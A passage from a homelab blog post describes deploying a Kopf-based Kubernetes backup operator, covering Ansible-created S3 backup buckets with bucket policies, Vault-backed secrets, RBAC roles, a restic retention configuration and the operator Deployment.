<p>Then I&rsquo;m creating the S3 buckets themselves. I&rsquo;m doing this with the Ansible
<a href="https://docs.ansible.com/ansible/latest/collections/amazon/aws/s3_bucket_module.html">amazon.aws.s3_bucket</a>
module. The Ansible play looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">candc</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Play for creating the backup buckets</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">backup</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">vars</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3_access</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;hashi_vault&#39;, &#39;secret=secret/backups:access token=&#39;+vault_token+&#39; url=&#39;+vault_url) }}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3_secret</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;hashi_vault&#39;, &#39;secret=secret/backups:secret token=&#39;+vault_token+&#39; url=&#39;+vault_url) }}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Create service backup buckets</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">backup</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">buckets</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">amazon.aws.s3_bucket</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backup-{{ item }}</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">access_key</span>: <span style="color:#e6db74">&#34;{{ s3_access }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secret_key</span>: <span style="color:#e6db74">&#34;{{ s3_secret }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">ceph</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">endpoint_url</span>: <span style="color:#ae81ff">https://s3.example.com</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">policy</span>: <span style="color:#e6db74">&#34;{{ lookup(&#39;ansible.builtin.template&#39;,&#39;bucket-policies/backup-services.json.template&#39;) }}&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">loop</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">audiobookshelf</span>
</span></span></code></pre></div><p>This play first fetches the credentials pushed into Vault with the PushSecret
above, using the <code>hashi_vault</code> lookup plugin. Be careful when searching for info on Vault in
Ansible: Ansible&rsquo;s own secret storage is unfortunately also called vault.
The lookup uses a Vault token I have to generate on my C&amp;C host before I can do
pretty much anything, which in turn needs credentials not stored on said host.</p>
<p>My backup buckets always follow the <code>backup-$APP</code> convention, and I&rsquo;m iterating
over the apps I need backup buckets for via a loop.
Also worth mentioning is the policy set here, which becomes the S3 bucket
policy of the new bucket.
It&rsquo;s created from this template:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;Version&#34;</span>: <span style="color:#e6db74">&#34;2012-10-17&#34;</span>,
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">&#34;Statement&#34;</span>: [
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Action&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:DeleteObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:PutObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:ListBucket&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetBucketLocation&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Effect&#34;</span>: <span style="color:#e6db74">&#34;Allow&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Resource&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::backup-{{ item }}/*&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::backup-{{ item }}&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Principal&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;AWS&#34;</span>: [
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;arn:aws:iam:::user/service-backup-user&#34;</span>
</span></span><span style="display:flex;"><span>        ]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    },
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Action&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetObject&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:ListBucket&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;s3:GetBucketLocation&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Effect&#34;</span>: <span style="color:#e6db74">&#34;Allow&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Resource&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::backup-{{ item }}/*&#34;</span>,
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;arn:aws:s3:::backup-{{ item }}&#34;</span>
</span></span><span style="display:flex;"><span>      ],
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&#34;Principal&#34;</span>: {
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">&#34;AWS&#34;</span>: [
</span></span><span style="display:flex;"><span>          <span style="color:#e6db74">&#34;arn:aws:iam:::user/external-backup-user&#34;</span>
</span></span><span style="display:flex;"><span>        ]
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Through the magic of jinja2 and some naming conventions, this policy template
will allow my service backup user to access all of the APIs needed by restic,
meaning read and write access. The second user, <code>external-backup-user</code>, is the
user I use to run backups to an external HDD. This user is more restricted than
the service backup user, because it only needs read access and never writes to
the backup buckets.</p>
<p>Short aside: Why use Ansible for the bucket creation, instead of Rook&rsquo;s
<a href="https://rook.io/docs/rook/latest-release/Storage-Configuration/Object-Storage-RGW/ceph-object-bucket-claim/">ObjectBucketClaim</a>?
Simple answer: Because of policies. Until very recently, there was no way to
configure a bucket policy via an ObjectBucketClaim, so I would have needed to
reach for Ansible or something else anyway. That&rsquo;s why I decided to go ahead and do the
bucket creation with Ansible as well.</p>
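<p>For comparison, a basic ObjectBucketClaim is not a lot of YAML either. This is just a
sketch, and the bucket StorageClass name is a placeholder rather than something from my setup:</p>
<pre tabindex="0"><code>apiVersion: objectbucket.io/v1alpha1
kind: ObjectBucketClaim
metadata:
  name: backup-audiobookshelf
  namespace: backups
spec:
  bucketName: backup-audiobookshelf
  # Placeholder: a bucket StorageClass pointing at the rgw-bulk object store.
  storageClassName: rgw-bulk-buckets
</code></pre>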
<p>Just for completeness&rsquo; sake, I also created an ExternalSecret for my restic
backup password:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;restic&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">service-backups</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">homelab-vault</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;1h&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">creationPolicy</span>: <span style="color:#e6db74">&#39;Owner&#39;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">pw</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remoteRef</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">secret/restic</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">property</span>: <span style="color:#ae81ff">password</span>
</span></span></code></pre></div><p>Incidentally, looking at the SecretStore name: I really need to stop prefixing
everything with &ldquo;homelab&rdquo; or &ldquo;hl&rdquo;. &#x1f605;</p>
<p>Last but not least, I also need a sort of scratch volume, where the S3 buckets
to be backed up are copied before being slurped up by restic.
It&rsquo;s a PVC looking like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PersistentVolumeClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vol-service-backup-scratch</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">service-backups</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">homelab-fs</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">storage</span>: <span style="color:#ae81ff">50Gi</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ReadWriteMany</span>
</span></span></code></pre></div><p>It needs to be RWX because it&rsquo;s shared among all backups for all apps, not one
per app. So instead of my customary Ceph RBD volume, it&rsquo;s a CephFS volume.
This is one part of my backup setup I still need to improve. At some point,
fully cloning an S3 bucket to a local disk and then feeding it into restic might no longer be
feasible.</p>
<p>Anyway, that&rsquo;s all the yak shaving necessary. Let&rsquo;s look at the backup operator
itself.</p>
<h2 id="the-operator-deployment">The operator deployment</h2>
<p>Because this is an operator, the first thing to consider is what access it
needs to the k8s API. For this, I defined one Role and one ClusterRole. The
ClusterRole is necessary so the operator can access a number of resources in
all namespaces, while the Role is for things where it only needs access in
its own namespace.</p>
<p>Let&rsquo;s begin with the ClusterRole:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterRole</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hlbo-cluster-role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">rules</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#75715e"># Needed for Kopf Framework</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#ae81ff">apiextensions.k8s.io]</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>: [<span style="color:#ae81ff">customresourcedefinitions]</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>: [<span style="color:#ae81ff">list, watch]</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>: [<span style="color:#ae81ff">events]</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>: [<span style="color:#ae81ff">create]</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">namespaces</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">list</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">watch</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">persistentvolumes</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">persistentvolumeclaims</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">get</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;storage.k8s.io&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">volumeattachments</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">get</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">list</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;mei-home.net&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">homelabbackupconfigs</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">homelabservicebackups</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">get</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">watch</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">list</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">patch</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">update</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;batch&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">jobs</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">get</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">watch</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">list</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">create</span>
</span></span></code></pre></div><p>A number of things in here are requirements from the <a href="https://github.com/nolar/kopf">kopf framework</a>
I used to implement the operator. It needs to be able to watch for CRDs because
it needs to handle them. The HomelabBackupConfigs and HomelabServiceBackups
are the two CRDs I introduced. PersistentVolumeClaims, PersistentVolumes and
VolumeAttachments are needed because that&rsquo;s what the operator backs up.
Both PersistentVolumes and VolumeAttachments are cluster-level resources.
And because PVCs generally live in the namespace of the app they&rsquo;re used by,
the operator needs cluster-wide access to those as well.
Finally, the cluster-wide access to Jobs is due to a quirk of Kopf.
I really only need to access Jobs in the operator&rsquo;s own namespace, to launch
them and monitor them. But the issue is that I&rsquo;m using Kopf&rsquo;s event handler
mechanism to watch for Job events, so I can react when a Job finishes or fails.
And Kopf only knows a single, global setting for which APIs it uses:
either the cluster-level ones or the namespaced ones. This can&rsquo;t be configured
per listener, only for the entire instance.</p>
<p>So in the end, even though I really only need control over Jobs in the operator&rsquo;s
own namespace, I still have to grant cluster-wide access.</p>
<p>Next, the Role:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">rbac.authorization.k8s.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Role</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hlbo-role</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">backups</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">rules</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">apiGroups</span>: [<span style="color:#e6db74">&#34;&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">configmaps</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">verbs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">get</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">watch</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">list</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">patch</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">update</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">create</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">delete</span>
</span></span></code></pre></div><p>I&rsquo;m creating ConfigMaps for the individual Jobs during the backup run, so I need
access. But in this case, I implemented all of the necessary access myself with
explicit API calls, without Kopf&rsquo;s involvement. This allowed me to scope the
access rights to a single namespace.</p>
<p>Then there&rsquo;s the general backup configuration, which is set with the
HomelabBackupConfig CRD. These are configuration options which don&rsquo;t differ per
app, and so can be set centrally, instead of having a block of similar config
settings in every individual app&rsquo;s backup config.
For my deployment, it looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">mei-home.net/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">HomelabBackupConfig</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backup-config</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">backups</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceBackup</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;30 1 * * *&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scratchVol</span>: <span style="color:#ae81ff">vol-service-backup-scratch</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3BackupConfig</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Host</span>: <span style="color:#ae81ff">s3.example.com:443</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">s3-backup-buckets-cred</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyIDProperty</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyProperty</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">s3ServiceConfig</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Host</span>: <span style="color:#ae81ff">s3.example.com:443</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">s3-backup-buckets-cred</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyIDProperty</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretKeyProperty</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resticPasswordSecret</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">restic</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretKey</span>: <span style="color:#ae81ff">pw</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resticRetentionPolicy</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">daily</span>: <span style="color:#ae81ff">7</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">weekly</span>: <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">monthly</span>: <span style="color:#ae81ff">6</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">yearly</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">jobSpec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">jobNS</span>: <span style="color:#e6db74">&#34;backups&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/hn-backup:5.0.0</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;hn-backup&#34;</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;kube-services&#34;</span>
</span></span></code></pre></div><p>This configures service backups to run every night at 01:30. It configures
the credentials and S3 servers for both the location of the apps&rsquo; S3 buckets
and the location of the backup buckets. These are currently the same, but if
I ever run two types of S3, e.g. if for some reason I decide to add a second Ceph
cluster or a MinIO instance, I can have the service and backup buckets on
different S3 servers.</p>
<p>Also of interest might be the retention policy. This keeps the backups for the
last 7 days, the backups for the Sundays of the last 6 weeks, the backups of the
last day of the month for the last 6 months and finally the backup from December
31st of the previous year.</p>
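<p>I&rsquo;m not showing the operator&rsquo;s actual restic invocation here, but the policy above
presumably boils down to <code>restic forget</code> flags roughly like these, expressed here as
container args:</p>
<pre tabindex="0"><code># Rough equivalent of the retention policy above, not the operator&#39;s real command.
command:
  - restic
  - forget
  - --keep-daily=7
  - --keep-weekly=6
  - --keep-monthly=6
  - --keep-yearly=1
  - --prune
</code></pre>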
<p>Finally, there&rsquo;s the definition of the container image and command to run during
individual backups, just in case I ever decide to change that setup
but want to keep the operator going.</p>
<p>And here, finally, the operator&rsquo;s deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/app</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">hlbo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceAccountName</span>: <span style="color:#ae81ff">hlbo-account</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">hl-backup-operator</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/hl-backup-operator:1.1.0</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">args</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-A&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-v&#34;</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#e6db74">&#34;-d&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">imagePullPolicy</span>: <span style="color:#ae81ff">Always</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">50m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">50Mi</span>
</span></span></code></pre></div><p>The <code>imagePullPolicy: Always</code> is mostly for the current, still somewhat &ldquo;beta&rdquo;
phase of use, so I can easily switch to using <code>:dev</code> images. The args are all
for Kopf. The <code>-A</code> says that Kubernetes&rsquo; cluster API should be used, while
<code>-v</code> and <code>-d</code> enable lots of debug output.</p>
<p>That&rsquo;s it, operator deployed. Now onto configuring a backup.</p>
<h2 id="configuring-backups-for-my-audiobookshelf-instance">Configuring backups for my Audiobookshelf instance</h2>
<p><a href="https://www.audiobookshelf.org/">Audiobookshelf</a> was the first user-facing
workload I deployed in k8s after setting up all the monitoring and infrastructure.
It stores everything on a single PersistentVolume, including progress and the
listened-to episodes of all of my podcasts. As such, I only need to back up that single
PVC, and I&rsquo;m good to go.</p>
<p>Backups are configured via the HomelabServiceBackups CRD. For my Audiobookshelf,
it looks like this:</p>
